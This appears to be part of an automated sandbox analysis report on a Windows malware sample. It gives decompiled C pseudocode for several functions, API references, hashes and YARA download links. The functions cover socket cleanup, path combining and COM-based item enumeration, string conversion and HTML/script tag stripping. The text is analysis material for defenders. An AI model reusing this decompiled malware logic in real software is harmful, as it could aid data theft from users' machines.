Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$CloseConnectHandleOpenOption
String ID: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1;)
API String ID: 910987326-3709307374
Opcode ID: a1f5871c53d99c0e01fc0476ecddd2cae4b2914766c24f5c4f72077345cf7842
Instruction ID: 8b7527cf8cbf7132b288a927cf5b3a63cfecc6b06cb693c38af1da8f2a651d01
Opcode Fuzzy Hash: a1f5871c53d99c0e01fc0476ecddd2cae4b2914766c24f5c4f72077345cf7842
Instruction Fuzzy Hash: 1B0181723403017BF624CB55DEC5FB762ADEB98B01F10042DFA05EA2E4D674AD05876D

Uniqueness

Uniqueness Score: -1.00%

Function 0041E2D0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0041E2D0(intOrPtr _a4) {
				signed int _t7;
				intOrPtr _t8;
				intOrPtr _t9;
				intOrPtr* _t11;
				intOrPtr* _t13;
				intOrPtr _t16;

				_t7 = WaitForSingleObject( *0x42edbc, 0);
				_t8 = _a4;
				if(_t7 == 0) {
					L11:
					__imp__#3(_t8);
					return _t7;
				}
				EnterCriticalSection(0x42edc4);
				_t16 =  *0x42e7ec;
				_t7 = 0;
				if(_t16 == 0) {
					L10:
					LeaveCriticalSection(0x42edc4);
					goto L11;
				}
				_t13 =  *0x42e71c;
				_t11 = _t13;
				while(1) {
					_t9 =  *_t11;
					if(_t9 == _t8 && _t9 != 0xffffffff) {
						break;
					}
					_t7 = _t7 + 1;
					_t11 = _t11 + 0xc;
					if(_t7 < _t16) {
						continue;
					}
					L9:
					goto L10;
				}
				_t7 = _t13 + (_t7 + _t7 * 2) * 4;
				if(_t7 != 0) {
					_t7 = E0041DF50(_t7, 0);
				}
				goto L9;
			}

0x0041e2d9
0x0041e2df
0x0041e2e5
0x0041e33b
0x0041e33c
0x0041e343
0x0041e343
0x0041e2ed
0x0041e2f3
0x0041e2f9
0x0041e2fd
0x0041e32f
0x0041e334
0x00000000
0x0041e33a
0x0041e300
0x0041e306
0x0041e308
0x0041e308
0x0041e30c
0x00000000
0x00000000
0x0041e313
0x0041e314
0x0041e319
0x00000000
0x00000000
0x0041e32e
0x00000000
0x0041e32e
0x0041e320
0x0041e325
0x0041e329
0x0041e329
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 0041E2D9
EnterCriticalSection.KERNEL32(0042EDC4), ref: 0041E2ED
LeaveCriticalSection.KERNEL32(0042EDC4), ref: 0041E334
closesocket.WS2_32(?), ref: 0041E33C

Strings

p0u, xrefs: 0041E33C

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeaveObjectSingleWaitclosesocket
String ID: p0u
API String ID: 903583691-1742372003
Opcode ID: d14a640a464fe9e183d54301400fc14b0462c6b6705cdd6f1014f4c40462f23e
Instruction ID: d8b08d56f72e8285ae4c8f4c3b7fd6e1f7a015e8aca15063f9719fa574978dde
Opcode Fuzzy Hash: d14a640a464fe9e183d54301400fc14b0462c6b6705cdd6f1014f4c40462f23e
Instruction Fuzzy Hash: CD0186357002169BC7205B27DC88AD77759EF95760B94052BFD16E72E0DB34A882C52D

Uniqueness

Uniqueness Score: -1.00%

Function 00421750, Relevance: 7.8, APIs: 5, Instructions: 315
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00421750(WCHAR* __ecx, signed char* __edx, intOrPtr _a4) {
				short _v524;
				char _v532;
				char _v596;
				char _v628;
				char _v640;
				char _v644;
				signed int _v652;
				char _v664;
				char _v684;
				char _v688;
				char _v692;
				intOrPtr* _v696;
				char _v700;
				char _v704;
				intOrPtr* _v708;
				signed int _v712;
				char _v716;
				signed int _v720;
				intOrPtr* _v724;
				signed int _v728;
				char _v736;
				char _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				signed int _v756;
				void* _v760;
				signed int _v764;
				signed int _v768;
				intOrPtr* _v772;
				char _v776;
				void* __ebx;
				void* __esi;
				WCHAR* _t87;
				signed int _t89;
				signed int _t95;
				intOrPtr* _t98;
				signed int _t99;
				intOrPtr* _t100;
				intOrPtr* _t103;
				signed int _t105;
				intOrPtr* _t107;
				signed int _t109;
				intOrPtr* _t111;
				signed int _t113;
				intOrPtr* _t115;
				signed int _t117;
				signed int _t118;
				signed int _t119;
				intOrPtr* _t120;
				intOrPtr* _t122;
				signed int _t124;
				signed int _t132;
				signed int _t136;
				intOrPtr* _t138;
				signed int _t140;
				signed int _t142;
				signed int _t144;
				intOrPtr* _t146;
				signed int _t148;
				intOrPtr* _t151;
				signed int _t153;
				signed int _t161;
				signed int _t162;
				void* _t163;
				intOrPtr _t164;
				WCHAR* _t166;
				signed int _t223;
				signed int _t225;
				signed char* _t229;
				char* _t231;
				char* _t232;
				char* _t233;
				char* _t234;
				char* _t235;
				intOrPtr* _t236;
				intOrPtr _t238;
				intOrPtr* _t239;
				signed int _t240;
				intOrPtr* _t241;
				intOrPtr* _t242;
				char* _t243;
				signed int _t245;
				void* _t247;

				_t166 = __ecx;
				_t247 = (_t245 & 0xfffffff8) - 0x2b4;
				_t229 = __edx;
				_t87 = __edx + 0x2c;
				_t225 = 0;
				if(_t87 != 0) {
					while(1) {
						_t223 =  *_t87 & 0x0000ffff;
						if(_t223 != 0x5c && _t223 != 0x2f) {
							goto L5;
						}
						_t87 =  &(_t87[1]);
					}
				}
				L5:
				_t89 = PathCombineW( &_v524, _t166, _t87);
				__eflags = _t89;
				if(_t89 == 0) {
					L58:
					return 1;
				} else {
					__eflags =  *_t229 & 0x00000010;
					if(( *_t229 & 0x00000010) == 0) {
						_push( &_v532);
						_t161 = E00419940();
						_v652 = _t161;
						__eflags = _t161 - _t225;
						if(_t161 != _t225) {
							_t231 =  &_v596;
							E00424100(0x7c, _t231);
							_t95 =  *((intOrPtr*)( *((intOrPtr*)( *_t161 + 0x90))))(_t161, _t231,  &_v688);
							__eflags = _t95;
							if(_t95 == 0) {
								_t98 = _v700;
								_t99 =  *((intOrPtr*)( *((intOrPtr*)( *_t98 + 0x24))))(_t98,  &_v716);
								__eflags = _t99;
								if(_t99 == 0) {
									while(1) {
										_t232 =  &_v628;
										E00424100(0x7d, _t232);
										_t103 = _v724;
										_t105 =  *((intOrPtr*)( *((intOrPtr*)( *_t103 + 0x94))))(_t103, _t232,  &_v684);
										__eflags = _t105;
										if(_t105 != 0) {
											_v728 = _t225;
										} else {
											_t151 = _v696;
											_t242 = _t151;
											_t153 =  *((intOrPtr*)( *((intOrPtr*)( *_t151 + 0x68))))(_t151,  &_v704);
											__eflags = _t153;
											if(_t153 != 0) {
												_v712 = _t225;
											}
											 *((intOrPtr*)( *((intOrPtr*)( *_t242 + 8))))(_t242);
											_v740 = _v716;
										}
										_t233 =  &_v664;
										E00424100(0x7e, _t233);
										_t107 = _v736;
										_t109 =  *((intOrPtr*)( *((intOrPtr*)( *_t107 + 0x94))))(_t107, _t233,  &_v684);
										__eflags = _t109;
										if(_t109 != 0) {
											_v728 = _t225;
										} else {
											_t146 = _v696;
											_t241 = _t146;
											_t148 =  *((intOrPtr*)( *((intOrPtr*)( *_t146 + 0x68))))(_t146,  &_v712);
											__eflags = _t148;
											if(_t148 != 0) {
												_v720 = _t225;
											}
											 *((intOrPtr*)( *((intOrPtr*)( *_t241 + 8))))(_t241);
											_v740 = _v724;
										}
										_t234 =  &_v664;
										E00424100(0x7f, _t234);
										_t111 = _v748;
										_t113 =  *((intOrPtr*)( *((intOrPtr*)( *_t111 + 0x94))))(_t111, _t234,  &_v700);
										__eflags = _t113;
										if(_t113 != 0) {
											_v756 = _t225;
											_t162 = _t225;
										} else {
											_t142 = _v712;
											_t240 = _t142;
											_t144 =  *((intOrPtr*)( *((intOrPtr*)( *_t142 + 0x68))))(_t142,  &_v736);
											__eflags = _t144;
											if(_t144 != 0) {
												_v744 = _t225;
											}
											 *((intOrPtr*)( *((intOrPtr*)( *_t240 + 8))))(_t240);
											_t162 = _v748;
											_v768 = _t162;
										}
										_t235 =  &_v700;
										E00424100(0x80, _t235);
										_t115 = _v760;
										_t117 =  *((intOrPtr*)( *((intOrPtr*)( *_t115 + 0x94))))(_t115, _t235,  &_v716);
										__eflags = _t117;
										if(_t117 == 0) {
											_t138 = _v728;
											_t239 = _t138;
											_t140 =  *((intOrPtr*)( *((intOrPtr*)( *_t138 + 0x68))))(_t138,  &_v744);
											__eflags = _t140;
											if(_t140 != 0) {
												_v752 = _t225;
											}
											 *((intOrPtr*)( *((intOrPtr*)( *_t239 + 8))))(_t239);
											_t225 = _v756;
										}
										_t118 = _v764;
										__eflags = _t118;
										if(_t118 == 0) {
											goto L47;
										}
										__eflags =  *_t118;
										if( *_t118 != 0) {
											__eflags = _t162;
											if(_t162 != 0) {
												__eflags =  *_t162;
												if( *_t162 != 0) {
													__eflags = _t225;
													if(_t225 != 0) {
														__eflags =  *_t225;
														if( *_t225 != 0) {
															_t211 = _v752;
															__eflags = _v752;
															if(_v752 == 0) {
																L41:
																_t163 = 0x15;
															} else {
																_t163 = E00411140(_t211);
																__eflags = _t163 - 1;
																if(_t163 < 1) {
																	goto L41;
																} else {
																	__eflags = _t163 - 0xffff;
																	if(_t163 > 0xffff) {
																		goto L41;
																	}
																}
															}
															_v760 = 0;
															E00424100(0x55,  &_v640);
															_push(_t163);
															_push(_v764);
															_push(_t225);
															_t132 = E00411DC0(__eflags,  &_v760,  &_v640, _v768);
															_t164 = _v760;
															_t247 = _t247 + 0x18;
															__eflags = _t132;
															if(_t132 > 0) {
																_t238 = _a4;
																_t136 = E00410D70(_t238, _t164, _t132);
																__eflags = _t136;
																if(_t136 != 0) {
																	_t73 = _t238 + 4;
																	 *_t73 =  *(_t238 + 4) + 1;
																	__eflags =  *_t73;
																}
															}
															E004107C0(_t164);
															_t162 = _v768;
															_t118 = _v764;
														}
													}
												}
											}
										}
										_t236 = __imp__#6;
										 *_t236(_t118);
										L48:
										_t119 = _v752;
										__eflags = _t119;
										if(_t119 != 0) {
											 *_t236(_t119);
										}
										__eflags = _t162;
										if(_t162 != 0) {
											 *_t236(_t162);
										}
										__eflags = _t225;
										if(_t225 != 0) {
											 *_t236(_t225);
										}
										_t120 = _v772;
										 *((intOrPtr*)( *((intOrPtr*)( *_t120 + 8))))(_t120);
										_t122 = _v760;
										_t124 =  *((intOrPtr*)( *((intOrPtr*)( *_t122 + 0x24))))(_t122,  &_v776);
										__eflags = _t124;
										if(_t124 == 0) {
											_t225 = 0;
											__eflags = 0;
											continue;
										}
										_t161 = _v728;
										goto L56;
										L47:
										_t236 = __imp__#6;
										goto L48;
									}
								}
								L56:
								_t100 = _v708;
								 *((intOrPtr*)( *((intOrPtr*)( *_t100 + 8))))(_t100);
							}
							 *((intOrPtr*)( *((intOrPtr*)( *_t161 + 8))))(_t161);
						}
						goto L58;
					} else {
						_t243 =  &_v644;
						E00424100(0x7b, _t243);
						_v692 = _t243;
						E00418700( &_v532,  &_v692, 1, 5, E00421750, _a4, _t225, _t225, _t225);
						return 1;
					}
				}
			}

0x00421750
0x00421756
0x0042175e
0x00421761
0x00421764
0x00421768
0x00421770
0x00421770
0x00421776
0x00000000
0x00000000
0x0042177d
0x0042177d
0x00421770
0x00421782
0x0042178c
0x00421792
0x00421794
0x00421abe
0x00421ac6
0x0042179a
0x0042179a
0x0042179d
0x004217e5
0x004217eb
0x004217ed
0x004217f1
0x004217f3
0x004217f9
0x00421802
0x00421818
0x0042181a
0x0042181c
0x00421822
0x00421831
0x00421833
0x00421835
0x00421842
0x00421842
0x0042184b
0x00421850
0x00421865
0x00421867
0x00421869
0x00421898
0x0042186b
0x0042186b
0x00421876
0x0042187c
0x0042187e
0x00421880
0x00421882
0x00421882
0x0042188c
0x00421892
0x00421892
0x0042189c
0x004218a5
0x004218aa
0x004218bf
0x004218c1
0x004218c3
0x004218f2
0x004218c5
0x004218c5
0x004218d0
0x004218d6
0x004218d8
0x004218da
0x004218dc
0x004218dc
0x004218e6
0x004218ec
0x004218ec
0x004218f6
0x004218ff
0x00421904
0x00421919
0x0042191b
0x0042191d
0x0042194c
0x00421950
0x0042191f
0x0042191f
0x0042192a
0x00421930
0x00421932
0x00421934
0x00421936
0x00421936
0x00421940
0x00421942
0x00421946
0x00421946
0x00421952
0x0042195b
0x00421960
0x00421975
0x00421977
0x00421979
0x0042197b
0x00421986
0x0042198c
0x0042198e
0x00421990
0x00421992
0x00421992
0x0042199c
0x0042199e
0x0042199e
0x004219a2
0x004219a6
0x004219a8
0x00000000
0x00000000
0x004219ae
0x004219b2
0x004219b8
0x004219ba
0x004219c0
0x004219c4
0x004219ca
0x004219cc
0x004219d2
0x004219d6
0x004219d8
0x004219dc
0x004219de
0x004219f4
0x004219f4
0x004219e0
0x004219e5
0x004219e7
0x004219ea
0x00000000
0x004219ec
0x004219ec
0x004219f2
0x00000000
0x00000000
0x004219f2
0x004219ea
0x00421a05
0x00421a0d
0x00421a1a
0x00421a1b
0x00421a1c
0x00421a26
0x00421a2b
0x00421a2f
0x00421a32
0x00421a34
0x00421a36
0x00421a3c
0x00421a41
0x00421a43
0x00421a45
0x00421a45
0x00421a45
0x00421a45
0x00421a43
0x00421a4a
0x00421a4f
0x00421a53
0x00421a53
0x004219d6
0x004219cc
0x004219c4
0x004219ba
0x00421a57
0x00421a5e
0x00421a68
0x00421a68
0x00421a6c
0x00421a6e
0x00421a71
0x00421a71
0x00421a73
0x00421a75
0x00421a78
0x00421a78
0x00421a7a
0x00421a7c
0x00421a7f
0x00421a7f
0x00421a81
0x00421a8b
0x00421a8d
0x00421a9c
0x00421a9e
0x00421aa0
0x00421840
0x00421840
0x00000000
0x00421840
0x00421aa6
0x00000000
0x00421a62
0x00421a62
0x00000000
0x00421a62
0x00421842
0x00421aaa
0x00421aaa
0x00421ab4
0x00421ab4
0x00421abc
0x00421abc
0x00000000
0x0042179f
0x0042179f
0x004217a8
0x004217bd
0x004217ce
0x004217db
0x004217db
0x0042179d

APIs

PathCombineW.SHLWAPI(?,?,?), ref: 0042178C

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CombinePath
String ID:
API String ID: 3422762182-0
Opcode ID: 4f659e9d74a8e5f42ed1a3e15ba5fa8383fa70de8cefdbbb13b929be5a74d9e8
Instruction ID: 5c1201b568dfa04a20a1807ef3c8fcaa5e4e558a5cfccd2aadc076cfd87f2839
Opcode Fuzzy Hash: 4f659e9d74a8e5f42ed1a3e15ba5fa8383fa70de8cefdbbb13b929be5a74d9e8
Instruction Fuzzy Hash: 4BB157757042119FC710DB69D880A6BB3E9EFD8304F54891EF98997360DB38ED42CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0040FB6D, Relevance: 7.8, APIs: 6, Instructions: 259COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000104,?,?,?,00000102,?,?,00000010,?,?,00000078), ref: 0040FD25
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000104,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?), ref: 0040FD6D
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000104,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?), ref: 0040FDAD
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,0000000A,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?), ref: 0040FDEA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,0000000A,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?), ref: 0040FE2A

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: cba5dde8d7e7c38459aa2db976023370e303a9a9eb8d04d11a0f8009feebcacd
Instruction ID: fdc7fe26f0b2c3ef3c28b8353ec72131834ca94e36f985c7aba88bf6d749c283
Opcode Fuzzy Hash: cba5dde8d7e7c38459aa2db976023370e303a9a9eb8d04d11a0f8009feebcacd
Instruction Fuzzy Hash: B89136716093807AD335DB20CC45BEBB7A5EF41704F04493EE68AEB5C2D674B248C799

Uniqueness

Uniqueness Score: -1.00%

Function 0040FC20, Relevance: 7.7, APIs: 6, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040FC20(intOrPtr* __edi, void* __ebp, void* __eflags) {
				char _v668;
				char _v796;
				char _v1056;
				char _v1076;
				char _v1080;
				char _v1086;
				intOrPtr _v1094;
				char _v1096;
				char _v1106;
				char _v1126;
				char _v1146;
				intOrPtr _v1214;
				char _v1460;
				char _v1464;
				char _v1544;
				char _v1556;
				char _v1572;
				void* __esi;
				int _t76;
				signed int _t77;
				int _t78;
				signed int _t79;
				int _t80;
				signed int _t81;
				int _t82;
				signed int _t83;
				int _t84;
				signed int _t85;
				int _t86;
				signed int _t87;
				intOrPtr* _t109;
				short* _t112;
				short* _t113;
				short* _t114;
				short* _t115;
				short* _t116;
				short* _t117;
				void* _t118;
				void* _t121;

				_t118 = __ebp;
				_t109 = __edi;
				_t121 =  &_v1544;
				E0041D150( &_v796);
				E00410820( &_v1056,  &_v668, 0x102);
				_t99 =  &_v1556;
				E00410820( &_v1556, 0x42eb80, 0x1e6);
				E00412640( &_v1080, _t99, 0x1e6);
				 *__edi = 0xe00;
				 *(__edi + 4) = 0;
				 *((intOrPtr*)(__edi + 8)) = 0x2020000;
				 *((intOrPtr*)(__edi + 0x36)) = _v1094;
				E0041D490(__edi + 0xc);
				 *((intOrPtr*)(__edi + 0x3a)) = E0040F040;
				 *((intOrPtr*)(__edi + 0x3e)) = E0040F070;
				 *(__edi + 0x42) = 0;
				E00410820(__edi + 0x46,  &_v1572, 0x78);
				E00410820(__edi + 0xbe,  &_v1464, 0x10);
				E00410820(__edi + 0xce,  &_v1460, 0x102);
				_t76 = 0;
				_t112 = __edi + 0x1d0;
				if(_v1214 != 0) {
					do {
						_t76 = _t76 + 1;
					} while ( *((char*)(_t121 + _t76 + 0x192)) != 0);
				}
				_push(_t118);
				_t77 = MultiByteToWideChar(0, 0,  &_v1146, _t76, _t112, 0x104);
				if(_t77 >= 0x104) {
					_t77 = 0;
				}
				_t112[_t77] = 0;
				_t78 = 0;
				_t113 = _t109 + 0x3d8;
				if(_v1126 != 0) {
					do {
						_t78 = _t78 + 1;
					} while ( *((intOrPtr*)(_t121 + _t78 + 0x1aa)) != 0);
				}
				_t79 = MultiByteToWideChar(0, 0,  &_v1126, _t78, _t113, 0x104);
				if(_t79 >= 0x104) {
					_t79 = 0;
				}
				_t113[_t79] = 0;
				_t80 = 0;
				_t114 = _t109 + 0x5e0;
				if(_v1106 != 0) {
					do {
						_t80 = _t80 + 1;
					} while ( *((intOrPtr*)(_t121 + _t80 + 0x1be)) != 0);
				}
				_t81 = MultiByteToWideChar(0, 0,  &_v1106, _t80, _t114, 0x104);
				if(_t81 >= 0x104) {
					_t81 = 0;
				}
				_t114[_t81] = 0;
				_t82 = 0;
				_t115 = _t109 + 0x7e8;
				if(_v1096 != 0) {
					do {
						_t82 = _t82 + 1;
					} while ( *((intOrPtr*)(_t121 + _t82 + 0x1c8)) != 0);
				}
				_t83 = MultiByteToWideChar(0, 0,  &_v1096, _t82, _t115, 0xa);
				if(_t83 >= 0xa) {
					_t83 = 0;
				}
				_t115[_t83] = 0;
				_t84 = 0;
				_t116 = _t109 + 0x9f0;
				if(_v1086 != 0) {
					do {
						_t84 = _t84 + 1;
					} while ( *((intOrPtr*)(_t121 + _t84 + 0x1d2)) != 0);
				}
				_t85 = MultiByteToWideChar(0, 0,  &_v1086, _t84, _t116, 0xa);
				if(_t85 >= 0xa) {
					_t85 = 0;
				}
				_t116[_t85] = 0;
				_t86 = 0;
				_t117 = _t109 + 0xbf8;
				if(_v1076 != 0) {
					do {
						_t86 = _t86 + 1;
					} while ( *((intOrPtr*)(_t121 + _t86 + 0x1dc)) != 0);
				}
				_t87 = MultiByteToWideChar(0, 0,  &_v1076, _t86, _t117, 0xa);
				if(_t87 >= 0xa) {
					_t87 = 0;
				}
				_t117[_t87] = 0;
				return E00410870(_t87,  &_v1544, 0, 0x1e6);
			}

0x0040fc20
0x0040fc20
0x0040fc20
0x0040fc2e
0x0040fc48
0x0040fc57
0x0040fc5c
0x0040fc70
0x0040fc7f
0x0040fc85
0x0040fc8c
0x0040fc93
0x0040fc96
0x0040fca6
0x0040fcad
0x0040fcb4
0x0040fcbb
0x0040fcd1
0x0040fcea
0x0040fcef
0x0040fcf1
0x0040fcfe
0x0040fd00
0x0040fd00
0x0040fd01
0x0040fd00
0x0040fd0b
0x0040fd25
0x0040fd2c
0x0040fd2e
0x0040fd2e
0x0040fd32
0x0040fd36
0x0040fd38
0x0040fd45
0x0040fd50
0x0040fd50
0x0040fd51
0x0040fd50
0x0040fd6d
0x0040fd74
0x0040fd76
0x0040fd76
0x0040fd7a
0x0040fd7e
0x0040fd80
0x0040fd8d
0x0040fd90
0x0040fd90
0x0040fd91
0x0040fd90
0x0040fdad
0x0040fdb4
0x0040fdb6
0x0040fdb6
0x0040fdba
0x0040fdbe
0x0040fdc0
0x0040fdcd
0x0040fdd0
0x0040fdd0
0x0040fdd1
0x0040fdd0
0x0040fdea
0x0040fdef
0x0040fdf1
0x0040fdf1
0x0040fdf5
0x0040fdf9
0x0040fdfb
0x0040fe08
0x0040fe10
0x0040fe10
0x0040fe11
0x0040fe10
0x0040fe2a
0x0040fe2f
0x0040fe31
0x0040fe31
0x0040fe35
0x0040fe39
0x0040fe3b
0x0040fe48
0x0040fe50
0x0040fe50
0x0040fe51
0x0040fe50
0x0040fe6a
0x0040fe70
0x0040fe72
0x0040fe72
0x0040fe81
0x0040fe91

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000104,?,?,?,00000102,?,?,00000010,?,?,00000078), ref: 0040FD25
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000104,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?), ref: 0040FD6D
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000104,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?), ref: 0040FDAD
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,0000000A,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?), ref: 0040FDEA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,0000000A,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?), ref: 0040FE2A

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 57640c5802e3739937cac81bd292fd6fc761685230f9e6cbd81225be922572b5
Instruction ID: f1e54da80d69ca8406bc3c17299e0b3cfc049142bcf35b73a2127b2e6d960b8b
Opcode Fuzzy Hash: 57640c5802e3739937cac81bd292fd6fc761685230f9e6cbd81225be922572b5
Instruction Fuzzy Hash: 7D61C0B16497407AE335DB20CC46FEBB7A9AF80704F00493EE68AE74C2D6B4715887D9

Uniqueness

Uniqueness Score: -1.00%

Function 00417690, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 172
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417690() {
				void* __edi;
				intOrPtr _t49;
				intOrPtr _t52;
				intOrPtr _t54;
				signed int _t55;
				char* _t56;
				char _t58;
				intOrPtr _t59;
				char _t62;
				void* _t64;
				intOrPtr _t65;
				signed char _t66;
				char _t67;
				signed char _t75;
				int _t76;
				intOrPtr _t79;
				char* _t81;
				char* _t82;
				intOrPtr _t83;
				char* _t85;
				void* _t86;

				_t83 =  *((intOrPtr*)(_t86 + 0x24));
				_t75 = 0;
				_t67 = 0;
				_t65 = 0;
				 *((char*)(_t86 + 0xf)) = 0;
				 *((intOrPtr*)(_t86 + 0x14)) = 0;
				 *((intOrPtr*)(_t86 + 0x10)) = 0;
				if(_t83 <= 0) {
					L43:
					return  *((intOrPtr*)(_t86 + 0x10)) - _t75 + _t83;
				} else {
					while(1) {
						_t79 =  *((intOrPtr*)(_t86 + 0x28));
						if(_t65 == 0 ||  *((char*)(_t75 + _t79)) != 0x3e) {
							goto L6;
						}
						_t65 = _t65 - 1;
						L41:
						_t83 =  *((intOrPtr*)(_t86 + 0x2c));
						_t75 = _t75 + 1;
						 *((intOrPtr*)(_t86 + 0x18)) = _t75;
						if(_t75 < _t83) {
							_t67 =  *((intOrPtr*)(_t86 + 0x13));
							continue;
						}
						goto L43;
						L6:
						_t49 =  *((intOrPtr*)(_t75 + _t79));
						if(_t49 != 0x3c) {
							if(_t65 == 0 && _t67 == 0 && _t49 != 0xd && _t49 != 0xa && _t49 != 9) {
								if(_t49 != 0x26 || _t83 - _t75 <= 5) {
									L54:
									 *((intOrPtr*)(_t86 + 0x14)) =  *((intOrPtr*)(_t86 + 0x14)) + 1;
									 *((char*)( *((intOrPtr*)(_t86 + 0x14)) + _t79)) =  *((intOrPtr*)(_t75 + _t79));
								} else {
									_t36 = _t79 + 1; // 0x1
									if(StrCmpNIA(_t75 + _t36, "nbsp;", 5) != 0) {
										goto L54;
									}
									_t75 = _t75 + 5;
									 *((intOrPtr*)(_t86 + 0x14)) =  *((intOrPtr*)(_t86 + 0x14)) + 1;
									 *((char*)( *((intOrPtr*)(_t86 + 0x14)) + _t79)) = 0x20;
								}
							}
							goto L41;
						}
						_t52 = _t65;
						_t65 = _t65 + 1;
						 *((intOrPtr*)(_t86 + 0x1c)) = _t65;
						if(_t52 != 0) {
							goto L41;
						}
						_t54 = _t83 - _t75;
						 *((intOrPtr*)(_t86 + 0x20)) = _t54;
						_t12 = _t79 + 1; // 0x1
						_t85 = _t75 + _t12;
						if(_t67 == 0) {
							if(_t54 <= 6) {
								L26:
								_t66 = 0;
								do {
									_t55 = _t66 & 0x000000ff;
									_t76 =  *(_t55 + 0x403604) & 0x000000ff;
									if( *((intOrPtr*)(_t86 + 0x20)) <= _t76) {
										goto L39;
									}
									_t56 =  *(0x4035d4 + _t55 * 4);
									_t81 = _t85;
									if( *_t85 == 0x3c) {
										_t23 =  &(_t85[1]); // 0x2
										_t81 = _t23;
									}
									if( *_t81 == 0x2f) {
										_t81 =  &(_t81[1]);
									}
									if(StrCmpNIA(_t81, _t56, _t76) == 0) {
										_t58 = _t81[_t76];
										if(_t58 == 0 || _t58 == 0x20 || _t58 >= 9 && _t58 <= 0xd || _t58 == 0x3e || _t58 == 0x2f) {
											_t59 =  *((intOrPtr*)(_t86 + 0x14));
											 *((char*)(_t59 +  *((intOrPtr*)(_t86 + 0x28)))) = ("\n\n\n \n\n\n\n\n\n\n\nscript")[_t66 & 0x000000ff];
											 *((intOrPtr*)(_t86 + 0x14)) = _t59 + 1;
											break;
										} else {
											goto L39;
										}
									}
									L39:
									_t66 = _t66 + 1;
								} while (_t66 < 0xc);
								_t75 =  *((intOrPtr*)(_t86 + 0x18));
								_t65 =  *((intOrPtr*)(_t86 + 0x1c));
								goto L41;
							}
							_t82 = _t85;
							if( *_t85 == 0x3c) {
								_t16 =  &(_t85[1]); // 0x2
								_t82 = _t16;
							}
							if( *_t82 == 0x2f) {
								_t82 =  &(_t82[1]);
							}
							if(StrCmpNIA(_t82, "script", 6) != 0) {
								goto L26;
							} else {
								_t62 = _t82[6];
								if(_t62 == 0 || _t62 == 0x20 || _t62 >= 9 && _t62 <= 0xd || _t62 == 0x3e || _t62 == 0x2f) {
									 *((char*)(_t86 + 0x13)) = 1;
									goto L41;
								} else {
									goto L26;
								}
							}
						}
						if(_t54 > 7 &&  *_t85 == 0x2f) {
							_t13 =  &(_t85[1]); // 0x2
							_t64 = E00417650("script", _t13, 6);
							_t75 =  *((intOrPtr*)(_t86 + 0x18));
							if(_t64 != 0) {
								 *((char*)(_t86 + 0x13)) = 0;
							}
						}
						goto L41;
					}
				}
			}

0x00417695
0x0041769a
0x0041769c
0x0041769e
0x004176a0
0x004176a4
0x004176a8
0x004176ae
0x00417801
0x0041780f
0x004176b4
0x004176c4
0x004176c4
0x004176ca
0x00000000
0x00000000
0x004176d2
0x004177ef
0x004177ef
0x004177f3
0x004177f4
0x004177fa
0x004176c0
0x00000000
0x004176c0
0x00000000
0x004176d8
0x004176d8
0x004176dd
0x0041782f
0x00417843
0x00417876
0x0041787d
0x00417881
0x0041784c
0x00417853
0x00417860
0x00000000
0x00000000
0x00417866
0x00417869
0x0041786d
0x0041786d
0x00417843
0x00000000
0x0041782f
0x004176e3
